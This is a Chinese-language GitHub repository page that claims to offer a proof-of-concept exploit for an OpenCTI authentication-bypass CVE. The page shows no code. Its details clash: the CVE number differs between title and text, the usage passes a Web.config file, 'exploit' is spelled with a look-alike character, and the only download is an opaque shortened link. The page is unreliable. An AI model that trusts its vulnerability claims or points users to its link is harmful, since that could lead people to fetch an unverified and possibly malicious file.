ByteWraith1/CVE-2026-27906

GitHub: ByteWraith1/CVE-2026-27906

针对 OpenCTI 平台 CVE-2026-27960 权限提升漏洞的概念验证工具,可在无需认证的情况下通过 API 冒充任意用户访问系统。

Stars: 0 | Forks: 0

# CVE-2026-27960 ### 概述 OpenCTI 平台存在一个权限提升漏洞,允许未经身份验证的攻击者利用 API 并以任何现有用户(包括默认管理员)的身份进行访问。 ### 发布日期 2026 年 5 月 5 日 ### 要点 - **严重程度**:严重 - **CVSS 评分**:9.8(高) - **机密性**:高 - **完整性**:高 - **可用性**:高 - **攻击媒介**:网络 - **攻击复杂度**:低 - **所需权限**:无 ### 要求 - Python 3.8+ - 库:requests, argparse(通过 `pip install -r requirements.txt` 安装) ### 用法 - 安装依赖项:`pip install -r requirements.txt` - 运行 explоit:`python explоit.py --target --file "/path/to/Web.config"` ### 工作原理 此漏洞影响 6.6.0 至 6.9.12 版本。建议用户升级至包含必要修复的 6.9.13 版本。此外,建议使用 APP__ADMIN__EXTERNALLY_MANAGED 配置禁用默认管理员账户,作为增强安全性的临时解决方法。 ### 道德使用警告 - 此脚本是 CVE-2026-27960 的概念验证,仅供教育和授权安全测试目的使用。 - **未经系统所有者明确许可,请勿在系统上使用此脚本。** - 滥用可能违反法律,包括美国的《计算机欺诈和滥用法》(CFAA) 或其他地区的类似法律。 - 在测试任何系统之前,请务必获得书面同意。 ### PoC explоit 下载请点击[此处](https://tinyurl.com/2s47k4a5)
标签:API安全, argparse, CISA项目, CVE-2026-27960, CVSS 9.8, JSON输出, masscan, OpenCTI, PoC, Python, requests, Web.config, Web报告查看器, 协议分析, 威胁情报平台, 威胁模拟, 安全漏洞, 无后门, 暴力破解, 未授权访问, 权限提升, 概念验证, 网络安全, 身份验证绕过, 逆向工具, 隐私保护, 高危漏洞, 默认管理员